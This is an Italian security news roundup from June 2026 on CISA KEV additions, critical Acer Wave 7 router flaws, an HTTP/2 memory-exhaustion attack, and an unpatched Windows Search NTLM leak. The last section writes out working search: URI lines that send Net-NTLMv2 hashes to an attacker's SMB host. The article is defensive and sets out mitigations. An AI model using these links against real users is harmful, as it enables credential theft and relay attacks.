Patch per Acer Wave 7 e la vulnerabilità irrisolta NTLM su Windows Search

CISA aggiorna il Known Exploited Vulnerabilities Catalog con due vulnerabilità già sfruttate in attacchi reali, mentre il panorama di rischio si allarga con una nuova HTTP/2 bomb, due falle critiche nei router Acer Wave 7 e un leak NTLMv2 non corretto nel gestore URI di Windows Search. Il 2 giugno 2026 l’agenzia americana inserisce nel catalogo KEV CVE-2022-0492, legata al kernel Linux, e CVE-2025-48595, collegata al framework Android, confermando che entrambe rappresentano vettori già utilizzati da attori malevoli. Nello stesso quadro, Acer pubblica un firmware di sicurezza per correggere vulnerabilità con CVSS 10.0 sui router Wave 7, mentre i ricercatori documentano un attacco HTTP/2 capace di esaurire decine di gigabyte di memoria con una sola connessione grazie all’abuso di HPACK e del controllo di flusso. A completare il fronte critico, Huntress descrive un leak NTLM nel gestore search: di Windows, capace di inviare hash Net-NTLMv2 a un server SMB controllato dall’attaccante tramite un semplice link. Il risultato è un insieme di minacce distribuite tra server web, router consumer, dispositivi Android, sistemi Linux e client Windows, con patch disponibili in alcuni casi e mitigazioni obbligatorie in altri.

CISA aggiunge CVE-2022-0492 e CVE-2025-48595 al catalogo KEV

L’aggiornamento del KEV da parte di CISA introduce due vulnerabilità che meritano priorità immediata nei processi di remediation. CVE-2022-0492 riguarda un problema di improper authentication nel kernel Linux, mentre CVE-2025-48595 interessa il framework Android attraverso un integer overflow. L’inserimento nel catalogo Known Exploited Vulnerabilities non ha valore puramente documentale, perché indica che CISA dispone di elementi sufficienti per considerare le falle sfruttate attivamente in ambienti reali. Per le agenzie federali americane, il Binding Operational Directive 22-01 impone la correzione entro le scadenze indicate, ma la raccomandazione riguarda anche le organizzazioni private, che dovrebbero trattare ogni nuova voce del KEV come una priorità operativa e non come un semplice aggiornamento informativo. Le due CVE colpiscono piattaforme ad ampia diffusione e possono diventare punti di ingresso o di consolidamento per attori malevoli interessati a server, endpoint mobili, ambienti containerizzati e dispositivi Android esposti.

• CVE-2022-0492 Linux Kernel Improper Authentication Vulnerability
• CVE-2025-48595 Android Framework Integer Overflow Vulnerability

CISA ribadisce così il ruolo del catalogo KEV come strumento vivo di gestione del rischio, fondato non soltanto sulla gravità teorica delle vulnerabilità ma soprattutto sull’evidenza dello sfruttamento attivo. Per i team di sicurezza, il messaggio è diretto: sistemi Linux e dispositivi Android devono essere verificati subito, aggiornati dove possibile e monitorati per indicatori di compromissione associati alle due falle.

Acer Wave 7 riceve firmware contro due vulnerabilità critiche

Il fronte router si apre con l’advisory pubblicato da Acer per i dispositivi Wave 7, colpiti da due vulnerabilità critiche nelle versioni firmware T7c_GBL_1.01.000055 e precedenti. La prima falla riguarda un problema di broken access control che espone il file acer_cgi.log senza autenticazione, rendendo visibili credenziali in chiaro relative all’interfaccia web e a Telnet. La seconda vulnerabilità deriva da una hardcoded cryptographic key nel componente upload.cgi, che consente a un attaccante di decifrare, modificare e ricrittografare backup di sistema sfruttando una chiave AES incorporata nel firmware. Entrambe le falle ottengono CVSS 10.0, punteggio massimo che riflette la possibilità di accessi non autorizzati, compromissione delle configurazioni e persistenza tramite modifiche malevole. Acer prepara un aggiornamento firmware destinato a mitigare i problemi entro fine giugno 2026 e indica agli utenti il percorso operativo attraverso la console di amministrazione su 192.168.76.1 o acerconnect.com, nella sezione System Management e poi Firmware Update. L’azienda raccomanda di non spegnere né scollegare il router durante l’aggiornamento, perché un’interruzione potrebbe causare malfunzionamenti. Il caso conferma ancora una volta quanto i router domestici e small office siano diventati asset sensibili: un dispositivo di rete compromesso può intercettare traffico, alterare DNS, creare backdoor persistenti e trasformarsi in punto di appoggio per attacchi successivi.

HTTP/2 bomb sfrutta HPACK e blocco della finestra di flusso

La nuova HTTP/2 bomb documentata dai ricercatori introduce un vettore di denial-of-service remoto particolarmente efficiente perché sfrutta meccanismi legittimi del protocollo HTTP/2. L’attacco combina la compressione HPACK con una tecnica di window stall, usando un singolo byte di intestazione indicizzato migliaia di volte nella dynamic table. Ogni riferimento obbliga il server ad allocare memoria, con un consumo che può variare da decine a migliaia di byte per elemento, mentre il client dichiara una finestra di flow-control a zero byte per impedire al server di liberare rapidamente le risorse. Successivamente, l’attaccante invia WINDOW_UPDATE da 1 byte per prolungare il timeout e mantenere il consumo di memoria attivo. Il risultato è un’amplificazione asimmetrica: un solo client su connessione da 100 Mbps può consumare fino a 32 GB di memoria su server come Apache o Envoy in circa 20 secondi. L’attacco non supera necessariamente i limiti di dimensione delle intestazioni decodificate, perché l’header rimane quasi vuoto dal punto di vista semantico; il danno deriva invece dal bookkeeping interno associato alla tabella dinamica e al mantenimento dello stato della connessione. La vulnerabilità colpisce configurazioni HTTP/2 di default su nginx, Apache httpd, Microsoft IIS, Envoy e Cloudflare Pingora, con oltre 880.000 siti potenzialmente esposti secondo rilevazioni su Shodan.

Nginx e Apache correggono la HTTP/2 bomb mentre IIS resta esposto

Le prime correzioni arrivano da nginx e Apache, ma il quadro resta parziale. nginx corregge la HTTP/2 bomb nella versione 1.29.8, introducendo la direttiva max_headers impostata a 1000 di default. Apache httpd interviene con mod_http2 v2.0.41, che conta i cookie contro LimitRequestFields e riduce la possibilità di abusare del meccanismo di compressione e gestione delle intestazioni. Al momento della pubblicazione, Microsoft IIS, Envoy e Cloudflare Pingora risultano invece senza patch definitive, rendendo necessarie mitigazioni operative. I ricercatori consigliano di disabilitare temporaneamente HTTP/2 dove l’aggiornamento non è immediatamente possibile, usando http2 off su nginx o Protocols http/1.1 su Apache. La raccomandazione può apparire drastica, ma il costo dell’attacco è estremamente basso rispetto all’impatto potenziale sul server. Il punto tecnico più importante è che la specifica HTTP/2 considera il rapporto di amplificazione in termini di dimensione del payload, ma non cattura pienamente il rischio di memory pinning, cioè la capacità di bloccare memoria sul server mantenendo una connessione quasi gratuita per il client. Questa lacuna dimostra come protocolli consolidati possano presentare superfici inattese quando implementazioni, compressione e controllo di flusso vengono combinati in modo ostile. Gli amministratori devono quindi trattare HTTP/2 come componente critico da patchare, limitare e monitorare, non come semplice opzione prestazionale.

Windows Search URI handler espone hash NTLMv2 senza patch

Il caso Windows documentato da Huntress riguarda un leak NTLM nel gestore URI di Windows Search, attivabile attraverso lo schema search: con il parametro crumb=location: seguito da un percorso UNC arbitrario. Un link costruito come search:query=test&crumb=location:\10.0.1.100\share forza il sistema a tentare una connessione verso un server SMB controllato dall’attaccante, attivando l’autenticazione NTLM e inviando l’hash Net-NTLMv2 prima che l’utente visualizzi qualsiasi errore. Il bug risiede in ExplorerFrame.dll e condivide codice con il gestore search-ms:. Il dettaglio più controverso riguarda la posizione di Microsoft, che ha corretto una falla analoga nello Snipping Tool con CVE-2026-33829, ma considera questo caso di gravità Moderate e non lo ritiene eleggibile per servicing. Secondo la ricostruzione, la segnalazione responsabile inviata il 15 aprile 2026 ha ricevuto risposta negativa rispetto alla correzione. Huntress riproduce il problema su Windows 11 25H2 Pro build 26200.8524, senza privilegi amministrativi e senza attivare Defender. La vulnerabilità è delicata perché non richiede malware né exploit complessi: basta indurre l’utente o il sistema ad aprire un link appositamente costruito per esporre credenziali riutilizzabili in attacchi di relay o cracking offline.

Il furto di hash NTLMv2 tramite link impone mitigazioni immediate

Il leak Net-NTLMv2 tramite Windows Search URI handler diventa particolarmente pericoloso perché può essere innescato con un collegamento distribuito via email, pagina web o comando locale come start “” “search:query=test&crumb=location:\attacker-ip\share”. La prima invocazione per sessione invia l’hash al server SMB dell’attaccante, mentre le successive possono restituire access denied fino al logout, rendendo l’evento meno visibile agli utenti meno esperti. L’hash catturato può essere usato per relay attack in ambienti dove la firma SMB non è obbligatoria o sottoposto a cracking offline, soprattutto se le password sono deboli o riutilizzate. In assenza di patch Microsoft, Huntress raccomanda mitigazioni di rete e hardening dell’autenticazione. Il blocco del traffico SMB outbound sulle porte TCP 445 e 139 dai client che non ne hanno necessità riduce drasticamente la possibilità di esfiltrare hash verso host controllati dall’attaccante. L’abilitazione di SMB signing limita i relay interni, mentre la disabilitazione totale di NTLM con RestrictSendingNTLMTraffic=2 rappresenta una misura più forte, da applicare però solo dopo test accurati per evitare impatti su applicazioni legacy. I team di sicurezza devono inoltre monitorare log e telemetria per l’uso anomalo degli schemi search: e search-ms:, che raramente dovrebbero comparire in flussi legittimi di navigazione o posta elettronica.

CISA, Acer, HTTP/2 e Windows indicano una stessa urgenza operativa

Le vulnerabilità raccolte in questo quadro colpiscono tecnologie differenti, ma condividono una stessa urgenza: ridurre rapidamente la superficie d’attacco prima che exploit noti, tecniche pubbliche o bug non patchati vengano integrati in campagne più ampie. Le due CVE inserite nel KEV da CISA confermano sfruttamento attivo su Linux e Android. I router Acer Wave 7 espongono credenziali e backup a causa di controlli deboli e chiavi crittografiche hardcoded. La HTTP/2 bomb dimostra che un singolo client può mettere sotto pressione server web diffusi consumando memoria in modo sproporzionato. Il leak NTLM su Windows mostra invece come un gestore URI apparentemente secondario possa trasformarsi in un canale di furto credenziali senza exploit binario e senza privilegi elevati. Per gli amministratori, la priorità consiste nel verificare sistemi Linux e Android rispetto alle CVE del KEV, aggiornare i router Acer appena disponibile il firmware, applicare patch nginx e Apache o disabilitare temporaneamente HTTP/2, limitare l’esposizione di IIS, Envoy e Pingora e introdurre mitigazioni SMB sui client Windows. La finestra di rischio è concreta perché molte di queste tecniche richiedono bassa complessità operativa e colpiscono componenti ampiamente distribuiti.

Mitigazioni immediate per server, router e client Windows

La risposta difensiva deve essere rapida e differenziata per tecnologia. Su Linux e Android occorre applicare aggiornamenti di kernel, framework e vendor patch relative a CVE-2022-0492 e CVE-2025-48595, dando priorità ai sistemi esposti o critici. Sui router Acer Wave 7, gli utenti devono installare il firmware aggiornato appena disponibile e verificare che credenziali web e Telnet non siano state esposte o riutilizzate altrove. Per la HTTP/2 bomb, le organizzazioni devono aggiornare nginx a 1.29.8, Apache httpd con mod_http2 v2.0.41 o disabilitare temporaneamente HTTP/2 dove il fix non è disponibile, mentre per IIS, Envoy e Pingora diventano necessari limiti di esposizione, rate limiting, monitoraggio della memoria e protezioni a livello reverse proxy o WAF. Su Windows, in assenza di patch, la mitigazione passa dal blocco del traffico SMB in uscita, dall’abilitazione di SMB signing, dal controllo dell’uso di NTLM e dal monitoraggio di URI search: e search-ms: in email, browser e processi avviati dagli utenti. Queste misure non eliminano tutte le possibilità di attacco, ma riducono sensibilmente i vettori più immediati. Il quadro conferma una regola ormai stabile della sicurezza operativa: patch management, segmentazione, logging e controllo dei protocolli legacy restano indispensabili anche quando le minacce emergono da componenti apparentemente ordinari come compressione HTTP, router domestici o handler URI di sistema.